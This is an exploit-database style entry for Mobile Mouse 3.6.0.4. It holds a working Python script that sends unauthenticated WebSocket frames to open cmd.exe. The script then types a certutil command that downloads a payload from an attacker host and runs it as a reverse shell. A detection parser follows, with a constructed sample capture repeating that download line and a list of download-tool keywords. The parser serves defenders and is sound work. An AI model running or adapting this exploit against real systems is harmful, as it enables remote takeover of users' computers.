# Exploit Title: Mobile Mouse 3.6.0.4 Unauthenticated Remote Code Execution via WebSocket Command Injection
# Date: 06/17/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://mobilemouse.com/
# Software Link: https://www.mobilemouse.com/downloads/setup.exe
# Version: 3.6.0.4
# Tested on: Windows 10 (Build 19044)

'''
Mobile Mouse 3.6.0.4 contains a critical unauthenticated remote code execution
vulnerability through its WebSocket interface. Notably, this exploit bypasses
all authentication mechanisms, including when the user has set a password for
the TCP interface. The WebSocket endpoint does not enforce any authentication,
allowing an attacker to send malicious WebSocket frames remotely and execute
arbitrary commands on the target system with the privileges of the Mobile Mouse
service.
'''

#!/usr/bin/env python3

import asyncio
import websockets
from time import sleep

target_ip = "192.168.8.105"
port = 35913  # default port
uri = f"ws://{target_ip}:{port}"
lhost = "192.168.8.100"
payload = "shell.exe"

async def exploit():
    async with websockets.connect(uri) as ws:
        print("[+] Connected")

        cmd = "SENDPROGRAMACTION\x1eRUN\x1ecmd.exe\x04"
        await ws.send(cmd)
        sleep(3)

        command_payload = f"KEY\x1e116\x1ecertutil -urlcache -split -f http://{lhost}/{payload} C:\\Windows\\Temp\\payload.exe & C:\\Windows\\Temp\\payload.exe\x1e\x04"
        await ws.send(command_payload)
        print("[+] reverse shell payload sent")

        execute = "KEY\x1e-1\x1eENTER\x1e\x04"
        await ws.send(execute)
        print("[+] Payload executed, check your listener!")

asyncio.run(exploit())
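
Detection-side companion, added here as an example and not part of the original exploit or of Mobile Mouse itself: a parser that splits WebSocket text payloads captured on the service port (35913 by default) into frames and flags remote program launches and typed command text. The frame layout (fields separated by `\x1e`, frame terminated by `\x04`, text in the second `KEY` argument) is inferred only from the strings above; the tool list, function names and sample capture are constructed assumptions.

```python
import re

FIELD_SEP, FRAME_END = "\x1e", "\x04"  # delimiters seen in the frames on this page
INTERPRETERS = {"cmd.exe", "cmd", "powershell.exe", "powershell", "wscript.exe", "mshta.exe"}
# Download/execute tooling typed as text; extend for your environment (assumption).
LOLBIN = re.compile(r"\b(certutil|bitsadmin|powershell|mshta|curl|wget)\b", re.I)

def parse_frames(payload):
    """Split one WebSocket text payload into frames, each a list of fields."""
    return [raw.split(FIELD_SEP) for raw in payload.split(FRAME_END) if raw]

def classify(fields):
    """Return an alert reason for one frame, or None if nothing stands out."""
    verb, args = fields[0].upper(), fields[1:]
    if verb == "SENDPROGRAMACTION" and len(args) >= 2 and args[0].upper() == "RUN":
        prog = args[1].rsplit("\\", 1)[-1].lower()
        kind = "interpreter" if prog in INTERPRETERS else "program"
        return f"remote {kind} launch: {args[1]}"
    # Assumed layout: KEY, key code, text. Flag text naming download/exec tools.
    if verb == "KEY" and len(args) >= 2 and LOLBIN.search(args[1]):
        return f"typed command text: {args[1][:60]}"
    return None

def scan(records):
    """records: iterable of (source_ip, payload). Returns [(source_ip, reason)]."""
    alerts = []
    for src, payload in records:
        for fields in parse_frames(payload):
            reason = classify(fields)
            if reason:
                alerts.append((src, reason))
    return alerts

# Constructed sample capture (documentation-range addresses, not real traffic).
SAMPLE = [
    ("203.0.113.9", "SENDPROGRAMACTION\x1eRUN\x1ecmd.exe\x04"),
    ("203.0.113.9", "KEY\x1e116\x1ecertutil -urlcache -f http://198.51.100.7/a.exe a.exe\x1e\x04"),
    ("203.0.113.9", "KEY\x1e-1\x1eENTER\x1e\x04"),
    ("192.0.2.20", "KEY\x1e104\x1eh\x1e\x04"),
]

if __name__ == "__main__":
    for src, reason in scan(SAMPLE):
        print(f"ALERT {src}: {reason}")
```

Because the endpoint accepts frames without authentication, any `SENDPROGRAMACTION` frame from a host that is not the user's paired phone is worth alerting on by itself; restricting port 35913 at the host firewall removes the exposure entirely.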